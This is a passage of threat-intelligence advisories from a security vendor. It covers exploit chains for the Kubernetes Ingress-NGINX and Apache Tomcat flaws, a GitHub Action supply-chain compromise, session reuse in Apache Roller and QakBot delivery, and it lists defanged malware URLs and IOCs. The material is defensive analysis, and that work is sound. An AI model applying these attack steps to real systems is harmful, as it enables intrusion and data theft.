https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/ https://redcanary.com/threat-detection-report/techniques/mshta/ https://www.csoonline.com/article/3610611/rising-clickfix-malware-distribution-trick-puts-powershell-it-policies-on-notice.html https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/?utm_source=linkedin&utm_campaign= Fake recaptcha &utm_medium=social https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://www.darkreading.com/endpoint-security/qakbot-resurfaces-fresh-wave-clickfix-attacks https://www.reliaquest.com/blog/using-captcha-for-compromise/ https://github.com/JohnHammond/recaptcha-phish https://www.proofpoint.com/uk/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/ https://thehackernews.com/2025/04/lazarus-group-targets-job-seekers-with.html https://circleid.com/posts/20231013-dns-abuse-and-redirection-enough-for-a-new-js-malware-to-hide-behind https://centripetalstg.wpenginepowered.com/alerts/security-bulletin-qakbot-qbot-malware/ --- ### [Critical Apache Roller Vulnerability Enables Unauthorized Session Persistence](https://www.centripetal.ai/threat-research/critical-apache-roller-vulnerability-enables-unauthorized-session-persistence) Published: 2025-04-17 Summary: CVE-2025-24859 is a critical vulnerability in Apache Roller that allows unauthorized session persistence by failing to invalidate active user sessions after a password change, potentially exposing… CVE-2025-24859 is a critical security vulnerability in Apache Roller, a Java-based web application used for blogging and content management, that allows unauthorized session reuse due to insufficient session expiration after a user's password is changed. Notably, the application fails to invalidate active user sessions upon password modification, irrespective of whether the change is initiated by the user or an administrative entity. When users update their credentials, previously established sessions remain valid, allowing attackers in possession of active session tokens to continue accessing the system without re-authentication. The issue affects Apache Roller prior to v6.1.5. and has been assigned a CVSS score of 10.0 (Critical), reflecting its high impact on confidentiality, integrity, and availability. The exploitation of this flaw exposes systems to unauthorized data access, privilege escalation, and persistence threats, especially in scenarios where session tokens are leaked or stolen. (The Hacker News, 2025) Vulnerability Type (CWE) CWE-163: Insufficient Session Expiration This vulnerability arises when a web site or application permits an attacker to reuse old session credentials or session IDs for authorization. CVSS Score Base Score: 10.0 (Critical) Attack Vector: Network (AV:N) Attack Complexity: Low (AC:L) Privileges Required: None (PR:N) User Interaction: None (UI:N) Scope: Unchanged (S:U) Impact on CIA: High Confidentiality: High (SC:H) Integrity: High (SI:H) Availability: High (SA:H) Impacted Versions VersionStatus6.1.4 or priorVulnerable6.1.5 or laterPatched Mitigation Steps Upgrade immediately to Apache Roller 6.1.5 or later, where session invalidation is enforced post-password change. Review session management settings to ensure best practices are applied, including timeouts and single-session constraints. Monitor for unusual session activity, especially logins from unfamiliar IPs after password resets. Educate users to report unexpected account activity. Exploit Process Attacker gains a valid session token: Through XSS injection, packet sniffing (Man-in-the-Middle attacks), or by exploiting predictable session ID generation (e.g., weak entropy in JSESSIONID). In some cases, attackers may exploit insufficient HTTPS enforcement to intercept tokens over unencrypted channels. User logs out or changes password: The user assumes their session has been terminated or invalidated across all devices. Apache Roller fails to expire the session: The application does not invalidate the existing session token after logout or password change. Attacker reuses the session ID: The attacker sends HTTP requests with the stolen JSESSIONID cookie. Roller incorrectly accepts and processes the session token, restoring full authenticated access. Attacker accesses the application: The attacker can potentially escalate privileges or exfiltrate sensitive information. This persists until the server is restarted or the session is manually revoked. Timeline April 9, 2025 - Announcement for release of patched v6.1.5. April 11, 2025 - Vulnerability reported by security researcher Haining Meng, who is credited for identifying this critical flaw. TTPs Session Hijacking via XSS or MITM: Leveraging client-side vulnerabilities or insecure transport to intercept session tokens. Abuse of Long-Lived Sessions: Exploiting Roller’s failure to terminate sessions post-password change or logout. Token Replay: Re-sending valid session cookies (JSESSIONID) to maintain access. Avoidance of Authentication Logs: Reuse of existing sessions avoids triggering new login events. Persistence via Passive Listening: Attackers may lie dormant until sessions naturally expire or are forcibly cleared. IOCs Continued session activity from outdated credentials. Multiple geographic IPs using the same session ID. Absence of login events after a password change. Session tokens active for abnormal durations (e.g., days/weeks). Access patterns inconsistent with legitimate user behavior. CVE-2025-24859 represents a critical session management flaw in Apache Roller, enabling attackers to retain access using old session tokens even after a user changes their password. This exposes systems to unauthorized access, persistent intrusion, and potential lateral movement within an environment. With a CVSS score of 10.0, the vulnerability demands immediate attention. Organizations should upgrade to Roller v6.1.5 or later, implement strict session invalidation policies, and monitor session activity for anomalies. Proactive threat detection and session lifecycle management are essential to mitigate risks from this exploit. (Cyber News, 2025). Centripetal’s Perspective Centripetal’s CleanINTERNET® service provides a proactive, intelligence-driven defense against vulnerabilities like CVE-2025-24859, which allows continued access to the Apache Roller application through old sessions even after password changes, potentially enabling unauthorized access if credentials were compromised. Leveraging billions of threat indicators, CleanINTERNET dynamically blocks malicious traffic using real-time global threat feeds and augmented human analysis, proactively protecting organizations from exploitation attempts involving known IoCs. This approach ensures reduced attack surface, enhanced security operations, and uninterrupted business continuity, enabling organizations to adopt a proactive and adaptive cybersecurity strategy against evolving threats. If you currently use Apache Roller please contact support@centripetal.ai. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources The Hacker News - Critical Apache Roller Vulnerability (CVSS 10.0) Enables Unauthorized Session Persistence National Vulnerability Database - CVE-2025-24859 Detail Cyber News - Apache Roller Flaw Exposes Systems to Unauthorized Access Apache Roller Threads - CVE-2025-24859: Apache Roller: Insufficient Session Expiration on Password Change Apache Roller Threads - Apache Roller 6.1.5 is available for download Medium - CVSS 10.0: Critical Apache Roller Vulnerability Enables Unauthorized Session Persistence DarkReading - Max Severity Bug in Apache Roller Enabled Persistent Access --- ### [Critical Vulnerabilities in Kubernetes Ingress NGINX Controller](https://www.centripetal.ai/threat-research/critical-vulnerabilities-in-kubernetes-ingress-nginx-controller) Published: 2025-03-26 Summary: CVE-2025-1974 is a critical RCE flaw in Kubernetes' Ingress-NGINX Controller affecting 40% of clusters. It allows unauthenticated attackers to inject arbitrary configs and potentially take over… CVE-2025-1974 is a critical remote code execution (RCE) vulnerability in Kubernetes' Ingress-NGINX Controller that allows unauthenticated attackers with network access to inject arbitrary NGINX configuration directives, potentially leading to full cluster compromise. Ingress-NGINX is a software-only ingress controller provided by the Kubernetes project. Because of its versatility and ease of use, ingress-nginx is quite popular: it is deployed in over 40% of Kubernetes clusters. The vulnerability stems from improper handling of user-supplied annotations in Ingress objects, which are processed by the admission controller without adequate sanitization. By crafting a malicious Ingress object, an attacker can execute arbitrary commands when the admission controller validates the NGINX configuration. The issue affects Ingress-NGINX Controller versions prior to v1.12.1, v1.11.5, and v1.10.7. CVE-2025-1974 has been assigned a CVSS score of 9.8 (Critical), reflecting its high impact on confidentiality, integrity, and availability. It is part of a broader set of vulnerabilities collectively referred to as "IngressNightmare," which includes CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, and CVE-2025-24513 —each exploiting weaknesses in Ingress annotation processing. Exploitation of this flaw could result in widespread Kubernetes cluster compromises, data exfiltration, and further attacks if chained with other vulnerabilities. (Wiz, 2025; Kubernetes, 2025; NVD, 2025). Vulnerability Type (CWE) CWE-653: Improper Isolation or Compartmentalization This vulnerability arises when a system fails to enforce proper separation between different execution contexts, allowing an attacker to break containment boundaries. In the case of CVE-2025-1974, inadequate isolation within the Ingress NGINX Controller permits malicious configuration injections that ultimately lead to unauthorized code execution within the Kubernetes environment. CVSS Score (NIST) Base Score: 9.8 (Critical) Attack Vector: Network (AV:N) Attack Complexity: Low (AC:L) Exploitation does not require specific environmental conditions, making this vulnerability accessible to attackers with a basic understanding of NGINX configurations and Kubernetes ingress controls. Privileges Required: None (PR:N) An attacker does not need any prior access to exploit this flaw, significantly increasing the risk of widespread abuse. User Interaction: None (UI:N) The attack can be fully automated without requiring user intervention, facilitating large-scale exploitation. Scope: Unchanged (S:U) The impact remains within the compromised Kubernetes pod but can lead to further privilege escalation and lateral movement within the cluster if additional misconfigurations are present. Impact on CIA: High – The vulnerability threatens all three core security principles: Confidentiality: High (C:H) Severe - allows attackers to gain unauthorized access to sensitive data within the compromised pod. Integrity: High (I:H) Severe - enables modification of system configurations and potential execution of malicious code. Availability: High (A:H) Severe -can lead to service disruption, denial of service, or the takeover of ingress resources. Impacted VersionsPatched Versions< v1.10.6v1.10.7v1.11.0 - 1.11.4v1.11.5v1.12.0v1.12.1 Mitigation Steps Upgrade Ingress-NGINX Controller: update to a patched version (v1.12.1, v1.11.5, or v1.10.7) to address the vulnerability. Restrict Network Access: implement network policies to limit access to the admission controller, ensuring it is not exposed externally and only trusted sources can communicate with it. Temporarily disable the admission controller component of Ingress-NGINX if you cannot upgrade right away. Exploit Process Phase 1: Configuration Injection The attacker injects malicious directives into the NGINX configuration using the ssl_engine directive, which allows arbitrary shared library loading. This directive bypasses security restrictions since nginx -t only tests but does not apply configurations. Phase 2: Uploading the Malicious Shared Library The attacker leverages NGINX’s client-body buffering mechanism. A large (>8KB) HTTP request is sent, causing NGINX to temporarily store the payload in the pod’s file system. NGINX immediately deletes the file, but an open file descriptor remains accessible via /proc. The attacker guesses the PID and file descriptor to retrieve the stored payload. Phase 3: Remote Code Execution The attacker sends an AdmissionReview request to the Ingress NGINX Controller with the ssl_engine directive. The directive points to the malicious shared library’s file descriptor path in ProcFS. nginx -t loads the attacker’s library, executing arbitrary code with Kubernetes pod privileges. Interaction with Other Vulnerabilities: According to Wiz, CVE-2025-1974 can be chained with other Kubernetes Ingress vulnerabilities, increasing the potential for privilege escalation and cluster-wide compromise: CVE-2025-24513 – Auth Secret File Path Traversal CVSS Score: 4.8 A directory traversal vulnerability in the ingress-NGINX Admission Controller feature, where attacker-controlled data is improperly included in a filename. On its own, this vulnerability can lead to denial-of-service (DoS) by interfering with configuration files or logs. When combined with other vulnerabilities, it can expose secret objects from the cluster, facilitating privilege escalation or further exploitation. CVE-2025-24514 – Auth-URL Annotation Injection CVSS Score: 8.8 The auth-url annotation allows specifying an external authentication URL, which is processed without sanitization. Attackers can inject malicious NGINX directives through auth-url, which are then executed when nginx -t runs. CVE-2025-1097 – Auth-TLS-Match-CN Annotation Injection CVSS Score: 8.8 The auth-tls-match-cn annotation requires: the value must start with CN=. all remaining characters must form a valid regular expression. The auth-tls-match-cn annotation is validated using regex, but a bypass allows arbitrary NGINX configurations to be injected. Requires access to an existing TLS certificate or a keypair secret, which many Kubernetes solutions provide by default. Can be used to gain access to secrets in kube-system, including service credentials and certificates. CVE-2025-1098 – Mirror UID Injection CVSS Score: 8.8 The UID of an Ingress object is processed without sanitization, allowing arbitrary NGINX directive injection. Since UID is not an annotation, it bypasses regex sanitization rules. Attackers can craft a malicious Ingress object with a UID containing escaped characters, leading to configuration injection. Chained Attack Scenario Attackers exploiting CVE-2025-24513 to traverse directories and access sensitive NGINX configuration or Kubernetes secret files. Attackers using CVE-2025-24514 to inject a malicious auth-url, setting up an external server that sends further payloads. Attackers leveraging CVE-2025-1097 to extract Kubernetes secrets and gain access to private keys and internal TLS certificates. Malicious actors exploiting CVE-2025-1098 to escalate privileges by injecting directives into UID fields, enabling lateral movement within the cluster. Executing CVE-2025-1974 as the final payload, achieving remote code execution within the ingress-nginx controller pod, leading to full Kubernetes cluster compromise. Timeline December 31, 2024 – Wiz Research reported CVE-2025-1974 and CVE-2025-24514 to Kubernetes. January 2, 2025 – Wiz Research reported CVE-2025-1097 to Kubernetes. January 3, 2025 – Kubernetes acknowledged the reports. January 9, 2025 – Kubernetes proposed a fix for CVE-2025-1097. January 10, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-1097. January 12, 2025 – Kubernetes proposed a fix for CVE-2025-1974. January 16, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-1974. January 20, 2025 – Kubernetes proposed a fix for CVE-2025-24513. January 21, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-24513. January 21, 2025 – Wiz Research reported CVE-2025-1098 to Kubernetes. February 7, 2025 – Kubernetes released internal patches for the injection vulnerabilities: CVE-2025-1098, CVE-2025-1097, and CVE-2025-24514. February 20, 2025 – Kubernetes notified Wiz Research that they removed the NGINX configuration validation from the admission controller, resolving CVE-2025-1974. March 10, 2025 – Kubernetes sent embargo notifications regarding the five vulnerabilities reported by Wiz Research. March 24, 2025 – Public disclosure. IOCs Unusual configuration changes in Ingress NGINX logs. Unexpected nginx -t execution with modified directives. Suspicious large HTTP requests to Ingress Controller. Anomalous library loads. Open file descriptors linked to deleted files in /proc. CVE-2025-1974 is a critical remote code execution vulnerability in the Ingress NGINX Controller, affecting Kubernetes environments. The flaw allows attackers to inject arbitrary NGINX configuration directives, leading to the potential execution of malicious shared libraries during the NGINX configuration validation process. Exploiting this vulnerability involves abusing the client-body buffering feature to upload a malicious shared library and leveraging the ssl_engine directive to load the payload, ultimately achieving remote code execution with high privileges, with the potential to compromise Kubernetes clusters and sensitive workloads. The Ingress NGINX team has released patches to address the issue in versions 1.12.1, 1.11.5, and 1.10.7. Organizations are urged to upgrade to the latest version and enforce strict annotation validation, as well as restrict access to Kubernetes secrets. Continuous monitoring of ingress traffic for anomalies, such as large HTTP requests, unexpected NGINX configuration changes and anomalous library loads, is recommended to detect potential exploitation attempts. Implementing these measures will reduce the attack surface and significantly mitigate the risk of exploitation (Wiz, 2025). Centripetal’s Perspective Centripetal’s CleanINTERNET® service provides a proactive, intelligence-driven defense against vulnerabilities like CVE-2025-1974, which allows attackers to inject malicious configurations leading to remote code execution in Kubernetes Ingress NGINX Controllers. Leveraging billions of threat indicators, CleanINTERNET® dynamically blocks malicious traffic using real-time global threat feeds and augmented human analysis, proactively protecting organizations from exploitation attempts involving known IoCs. This approach ensures reduced attack surface, enhanced security operations, and uninterrupted business continuity, enabling organizations to adopt a proactive and adaptive cybersecurity strategy against evolving threats. If you are a current client of Kubernetes please contact support@centripetal.ai. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources Wiz - IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX National Vulnerability Database - CVE-2025-1974 Detail Kubernetes - Ingress-nginx CVE-2025-1974: What You Need to Know Armosec - IngressNightmare: Analysis of Critical Vulnerabilities in Kubernetes Ingress NGINX Controller Ravie Lakshmanan - Critical Ingress NGINX Controller Vulnerability Allows RCE Without Authentication Rapid7 - Multiple vulnerabilities in Ingress NGINX Controller for Kubernetes --- ### [GitHub Action Supply Chain Attack; reviewdog/action-setup](https://www.centripetal.ai/threat-research/security-bulletin-github-action-supply-chain-attack) Published: 2025-03-25 Summary: CVE-2025-30154: GitHub Action supply chain attack on reviewdog/action-setup exposed CI/CD secrets. Discover how attackers injected malicious code, impacted repositories, and what mitigation steps to… On March 11, 2025, a supply chain attack targeting the widely used GitHub Action reviewdog/action-setup@v1, leading to the exposure of sensitive CI/CD secrets across multiple repositories. The attack was identified by Wiz Research, which determined that this compromise played a pivotal role in the tj-actions/changed-files incident (Wiz, 2025). The attack involved unauthorized modifications to the v1 tag of reviewdog/action-setup, injecting malicious code designed to exfiltrate secrets from CI/CD workflows. Initially believed to affect 23,000 repositories, deeper analysis found that only 218 repositories leaked secrets, limiting the impact (Endor Labs, 2025). Further investigation by Aqua Security confirmed that nearly all tagged versions of tj-actions/changed-files had been compromised, granting attackers direct access to running containers and virtual machines’ memory, allowing them to extract sensitive secrets (Aqua Security, 2025). The incident has been assigned CVE-2025-30154, with security researchers urging immediate mitigation actions to prevent further exploitation (InfoWorld, 2025). On March 24, 2025, CISA added CVE-2025-30154 to its Known Exploited Vulnerabilities (KEV) catalog, underscoring the urgency of mitigation due to active exploitation in the wild (CISA, 2025). Attack Chain Initial Compromise of reviewdog/action-setup Attackers gained write access through either compromised contributor credentials or an automated invite mechanism, which allowed unauthorized access (Wiz, 2025). Injected a hardcoded payload into the install.sh file used by the action. Propagation to Dependent Actions Since tj-actions/eslint-changed-files relied on reviewdog/action-setup, the compromised action allowed secrets to be dumped in workflow logs. Attackers were able to steal the Personal Access Token (PAT) of tj-actions-bot, enabling further exploits (Unit 42, 2025). Execution and Secret Exfiltration Malicious scripts dumped process memory, searching for secrets. Secrets were double-encoded in base64 to bypass GitHub’s log masking mechanisms. If workflow logs were publicly accessible, secrets were leaked to anyone with access. Impact Analysis & Blast Radius 5,416 repositories referenced tj-actions/changed-files, but only 614 executed workflows during the compromise window. Out of those, only 218 repositories leaked secrets into logs (Endor Labs, 2025). Most leaked secrets were GitHub install access tokens, which expire after workflow execution, reducing the long-term risk. Aqua Security’s investigation found that attackers inserted a malicious Python script (memdump.py) to extract sensitive environment variables (Aqua Security, 2025). Supply chain attack overview Source: Wiz Mitigation Strategies Identify if your repositories use affected actions (CISA, 2025): Run the following GitHub query: github.com/search?q=reviewdog/action-setup@v Rotate all secrets and credentials: AWS keys, GitHub PATs, npm tokens, and RSA keys should be revoked and reissued (Unit 42, 2025). Audit workflow logs: Search for double-encoded base64 payloads, which indicate leaked secrets (BleepingComputer, 2025). Attacker payload introduced to install.sh Source: Wiz Remove affected actions from workflows: Replace references to reviewdog/action-setup@v1 with secure alternatives or direct binary installations (Wiz, 2025). TTPs & IOCs Tactics, Techniques, and Procedures (TTPs) Initial Access: Use of compromised GitHub contributor accounts. Execution: Injection of base64-encoded payloads into workflows. An example, found in the wild, of the malicious payload executing Source: Wiz Defense Evasion: Double-encoding secrets to bypass log masking. Exfiltration: Extracting secrets from workflow logs (Unit 42, 2025). Indicators of Compromise (IOCs) Malicious SHA1 Hash: 0e58ed8671d6b60d0890c21b07f8835ace038e67 Suspicious Log Entries: Unauthorized admin logins and system modifications (Wiz, 2025). Centripetal’s Perspective The reviewdog/action-setup compromise highlights the growing risks in software supply chain security, particularly in CI/CD environments that depend on external GitHub Actions. While the scale of affected repositories was initially feared to be in the tens of thousands, detailed analysis shows that only 218 repositories actively leaked secrets (Endor Labs, 2025). Organizations should immediately remediate their environments by removing affected actions, rotating secrets, and implementing security best practices. By pinning dependencies, restricting permissions, and monitoring for anomalies, companies can enhance their cyber resilience against future supply chain threats. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources https://www.wiz.io/blog/new-github-action-supply-chain-attack-reviewdog-action-setup https://www.bleepingcomputer.com/news/security/github-action-hack-likely-led-to-another-in-cascading-supply-chain-attack/ https://unit42.paloaltonetworks.com/github-actions-supply-chain-attack/ https://www.infoworld.com/article/3849245/github-suffers-a-cascading-supply-chain-attack-compromising-ci-cd-secrets.html https://www.aquasec.com/blog/github-action-tj-actions-changed-files-compromised/ https://www.endorlabs.com/learn/blast-radius-of-the-tj-actions-changed-files-supply-chain-attack https://www.cisa.gov/known-exploited-vulnerabilities-catalog --- ### [Remote Code Execution with Partial PUT on Apache Tomcat Instances](https://www.centripetal.ai/threat-research/security-bulletin-remote-code-execution-with-partial-put-on-apache-tomcat-instances) Published: 2025-03-20 Summary: A critical vulnerability (CVE-2025-24813) in Apache Tomcat allows unauthenticated remote code execution, enabling attackers to overwrite files and run arbitrary code. With a CVSS score of 9.8,… Apache Tomcat has disclosed a new critical vulnerability, CVE-2025-24813, which affects multiple versions due to improper handling of partial PUT requests and path equivalence flaws. This unauthenticated remote code execution (RCE) vulnerability allows threat actors to exploit Apache Tomcat without requiring valid credentials, significantly increasing the attack surface. Once exploited, attackers can bypass security controls, overwrite files, and execute arbitrary code on vulnerable servers, posing a severe risk to organizations. The impact extends to confidentiality, integrity and availability, making this a high-priority security threat. Given its severity, the National Vulnerability Database (NVD) has assigned it a CVSS score of 9.8 (Critical). Immediate mitigation steps, such as upgrading to a patched version, disabling partial PUT support, and restricting unauthorized file uploads, are strongly recommended. Vulnerability Type (CWE) CWE-44 - Path Equivalence: 'file.name' (Internal Dot) Derived from Improper path equivalence checks when handling filenames with internal dots (…) and PUT requests. Incorrect path resolution allows attackers to bypass security measures, overwrite files, or achieve RCE. CWE-502 - Deserialization of Untrusted Data Resulting from improper input sanitization when a serialized Java session file is uploaded via a partial PUT request and subsequently triggers deserialization by referencing the malicious session ID in a GET request. CVSS Score (NIST) Base Score: 9.8 (Critical) Attack Vector: Network (AV:N) The attack can be carried out remotely, HTTP PUT request uploading a Java session file. Attack Complexity: Low (AC:L) No special conditions are required for exploitation, making it easy for attackers to execute. Privileges Required: None (PR:N) No authentication or credentials are needed for exploitation, making it accessible to any attacker. User Interaction: None (UI:N) The attack does not require victims to take any action. Scope: Unchanged (S:U) The exploit only affects the targeted system and does not extend beyond its security boundaries. Impact on Confidentiality, Integrity and Availability (CIA): Confidentiality - High (C:H) Severe Integrity - High (I:H) Severe Availability - High (A:H) Severe Impacted Apache Tomcat Versions Vulnerable VersionsRecommended Upgrade11.0.0-M1 to 11.0.211.0.3 or later10.1.0-M1 to 10.1.3410.1.35 or later9.0.0.M1 to 9.0.989.0.99 or later Mitigation Steps Vulnerable versions should be upgraded to a patched version as the first and most effective step in mitigating the vulnerability. If an immediate upgrade is not feasible, this vulnerability can be temporarily mitigated by: Reverting to the default servlet configuration by setting readonly="true". Disabling partial PUT by modifying allowPartialPut to false in conf/web.xml. Blocking unauthorized PUT and DELETE requests and restricting access to sensitive directories. Exploit Process According to (Apache), certain conditions must be met for a threat actor to successfully perform remote code execution (RCE). All of the following must be true: Write permissions enabled for the default servlet (disabled by default). Support for partial PUT requests enabled (enabled by default). Application using Tomcat's file-based session persistence with the default storage location. Application containing a library vulnerable to deserialization attacks. And, if all of the following conditions are met, a threat actor can view security-sensitive files and inject malicious content into them. Write permissions enabled for the default servlet (disabled by default). Support for partial PUT requests enabled (enabled by default). a target URL for security sensitive uploads that was a sub-directory of a target URL for public uploads. Attacker knowledge of the filenames of security-sensitive uploads. Security-sensitive files being uploaded using partial PUT requests. According to a DarkReading article published on March 17th, 2025, a group of Wallarm researchers in Poland detected the first attack previous to the exploit being published by a Chinese forum user, iSee857. The simplified 2-step breakdown is as follows: Upload a serialized Java session file: A threat actor uploads a crafted Java session file via a PUT request. By manipulating the file name and path, they exploit a path equivalence vulnerability, allowing them to place the session file in an accessible location. Trigger execution: The threat actor then sends a GET request referencing the malicious session ID, triggering the deserialization of the uploaded session file. This process can potentially lead to remote code execution (RCE). Timeline March 10, 2025: CVE Assignment - NVD published the first details for CVE-2025-24813. March 12, 2025: Exploitation in the Wild - Attacks in the wild have been reported by IONIX. March 15, 2025: Proof of Concept (PoC) Released. March 18, 2025: Detection in Vulnerability Scanners - Detection for the vulnerability has been added to Qualys. Feedly provides a more comprehensive timeline of events. TTPs & IOCs Some Tactics, Techniques, and Procedures (TTPs) associated with this CVE may trigger events within a network. The following are signs that may indicate ongoing exploitation in a network environment. Unusual Web Requests – Watch for unexpected PUT requests, JSP file uploads, and odd user-agents in Apache Tomcat logs. Suspicious File Changes – Monitor for new or modified JSP/WAR files, log tampering, and unauthorized deployments in web directories. Abnormal Process & Network Activity – Detect Tomcat spawning shells, new outbound connections, and privilege escalation attempts. Centripetal’s Perspective Centripetal is actively monitoring the development of CVE-2025-24813. We recognize the critical role Apache Tomcat plays in enterprise environments and the widespread risk this vulnerability presents. While it is considered high risk, successful remote code execution (RCE) depends on specific configuration dependencies, limiting its immediate exploitability. This pattern aligns with many previous Apache Tomcat vulnerabilities, where successful exploitation has consistently relied on particular system conditions. Given the potential for severe consequences on confidentiality, integrity, and availability, we strongly urge organizations to prioritize remediation efforts. CleanINTERNET® leverages proactive threat intelligence to stay ahead of emerging threats like CVE-2025-24813 and the adversaries attempting to exploit it. If you are a current client of Apache Tomcat and need any assistance with this advisory, please contact support@centripetal.ai Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq https://nvd.nist.gov/vuln/detail/CVE-2025-24813 https://www.cve.org/CVERecord?id=CVE-2025-24813 https://thehackernews.com/2025/03/apache-tomcat-vulnerability-comes-under.html https://access.redhat.com/security/cve/cve-2025-24813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24813 https://github.com/absholi7ly/POC-CVE-2025-24813?tab=readme-ov-file#output https://www.ionix.io/blog/apache-tomcat-path-equivalence-vulnerability-cve-2025-24813/ https://www.bleepingcomputer.com/news/security/critical-rce-flaw-in-apache-tomcat-actively-exploited-in-attacks/ https://lab.wallarm.com/one-put-request-to-own-tomcat-cve-2025-24813-rce-is-in-the-wild/ https://www.darkreading.com/vulnerabilities-threats/apache-tomcat-rce-vulnerability-exploit https://feedly.com/cve/CVE-2025-24813 https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html https://www.rapid7.com/blog/post/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/#:~:text=Tomcat is widely deployed and,there's no need to panic. --- ### [QakBot’s Modular Architecture and Evasion Techniques](https://www.centripetal.ai/threat-research/qakbots-modular-architecture-and-evasion-techniques) Published: 2025-03-20 Summary: QakBot (also known as Qbot) is a highly adaptive malware that has evolved from a banking trojan into a sophisticated threat, enabling credential theft, lateral movement, and ransomware deployment… QakBot (also known as Qbot or Pinkslipbot) is a highly adaptive malware that has evolved over the past decade to evade security defenses. Initially developed as a banking trojan to steal financial data, it has since expanded its capabilities, employing advanced evasion techniques and a modular architecture to facilitate credential theft, lateral movement, and ransomware deployment. QakBot’s Evolution The QakBot malware campaign has evolved over the past decade. Since its initial development, QakBot has continuously adapted to major security advancements, implementing significant changes to its design. It has demonstrated the ability to dynamically incorporate new features, ranging from modifications in payload delivery to enhanced persistence mechanisms that evade detection. The following timeline highlights the most impactful changes since its inception.(Zscaler,2024) 2007 - 2016 : Emergence, Expansion and Transition QakBot/Qbot emerges as a banking trojan targeting financial institutions Developed self-propagation features, such that permitted it to spread like a worm within a network Capable to modify Windows registries to establish persistence Established an encrypted channel to avoid detection when communicating with a command and control server (C2) Developed a modular botnet architecture which allowed the deployment of additional payloads Incorporated a feature that detected analysis tools and environments (VMs and Sandboxes) 2019 - 2021 : Access Broker Role, Ransomware Engagement and Evolution Focus shifted to providing network access to ransomware groups, becoming an access broker Leveraged on macros in Office documents to infect system as phishing email attachments Became the primary vector for deploying various ransomware families such as Conti and REvil Exploited network protocols and tools to facilitate lateral movement Adapted to new infection vectors , using OneNote files and other attachments to bypass email security filters Adopted living-off-the-land techniques to execute malicious code stealthily 2022 - Present : Malware-as-a-Service, Law Enforcement and New Developments Facilitated large-scale ransomware attacks Diversified malware infection methods by employing compromised website and exploit kits Maintained a resilient C2 infrastructure by implementing techniques like Domain Generation Algorithms (DGA) Operation Duck Hunt lead by the FBI and international partners led to the dismantling of QakBot’s infrastructure, including the deployment of a utility to uninstall QakBot from 700,000 infected systems Post-Takedown has encouraged the emergence of new variants with similar functionalities Delivery & Attack Chain QakBot employs various attack vectors, one of which is distribution through malicious spam (malspam), a method used since its initial development. The subsequent stages of the attack leverage an email distribution technique. Figure 1. Malspam as an infection vector, sourced from FidelisSecurity Malicious email - QakBot uses fake email chains that spoof legitimate email addresses Link to zip archive - Email attachment contains a URL link that point to an archive file: “hxxps://prajoon.000webhostapp[.]com/wp-content/uploads/2019/12/last/033/033.zip” Downloaded zip archive - The provided URL returns a ZIP file Extracted VBS file = The extracted ZIP file contains a Visual Basic Script (VBS) file VBS file retrieves malware - The VBS file contains URLs pointing to QakBot Windows executables. Most of these URLs contain a file named ****  ”44444.png or 444444.png” “hxxp://centre-de-conduite-roannais[.]com/wp-content/uploads/2019/12/last/444444**.png”** Initial Qakbot binary - Uses PowerShell,mshta.exe,rundll32.exe, or regsvr32.exe to execute QakBot’s DLL, writing its binaries to disk or executing them directly in memory to evade detection. Post infection activity - Maintains persistence by modifying the Windows Registry and proceeds with modular operations, including credential theft, lateral movement, and additional payload delivery (e.g., ransomware). QakBot’s Command-and-Control Structure Before Its 2023 Takedown QakBot's dynamic three-tier command-and-control infrastructure was designed for resilient and covert operations worldwide. Prior to its takedown in August 2023, the botnet remained highly active. In Tier 1, select infected computers were promoted to “supernodes” via an additional software module, relaying commands and masking their origin. These supernodes connected to Tier 2 proxy servers that further obscured the link to the main control center. In Tier 3, the main control server issued primary commands, its location hidden by the lower tiers. By leveraging third-party hosting providers and frequently reconfiguring supernodes, QakBot was able to evade detection for years. (CISA, 2023) As of mid-June 2023, 853 active supernodes had been identified in 63 countries, with frequent changes observed to hinder tracking. However, in August 2023, an international law enforcement operation successfully dismantled QakBot's infrastructure, severing its ability to issue new commands. Despite this significant disruption, no arrests were made in connection with the takedown. Instead, authorities focused on neutralizing the botnet by redirecting infected systems to a law enforcement-controlled server, preventing further malicious activity. (24by7Security, 2023) Despite this major takedown, reports indicate that QakBot has resurfaced with new infrastructure. In December 2023, security researchers observed a resurgence of QakBot malware, with updated versions employing new tactics to infect systems. This resurgence underscores the adaptability of such malware operations, even after significant disruptions. (The Register, 2023) Figure 2. QakBot's Command and Control Infrastructure, Sourced from CISA Centripetal’s Perspective To evaluate CleanINTERNET®’s coverage, we analyzed a sample of the 1,000 most recent IPs reported by Threatfox as part of the Qakbot campaign. Given the high volume of Indicators of Compromise over the past year, this analysis helps measure the effectiveness of our intelligence. The figures below compare Centripetal’s intelligence coverage date with the Threatfox report date. As shown in Figure 3, IP 